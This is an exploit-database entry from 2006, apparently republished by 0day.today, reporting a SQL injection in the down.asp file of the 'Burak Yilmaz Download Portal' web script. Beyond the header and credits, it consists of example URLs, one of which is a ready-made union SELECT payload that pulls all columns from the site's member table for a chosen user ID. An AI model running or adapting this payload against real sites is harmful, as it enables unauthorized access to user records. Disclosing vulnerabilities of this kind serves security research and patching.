Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability

2006-12-19T00:00:00
ID 1337DAY-ID-1276
Type zdt
Reporter ShaFuck31
Modified 2006-12-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability
===================================================================




# script name : Burak Y.lmaz Download Portal

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The R?D | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : down.asp

#Vuln :
http://www.victim.com/ScriptPath/down.asp?id=[SqL]
http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36



#  0day.today [2016-04-20]  #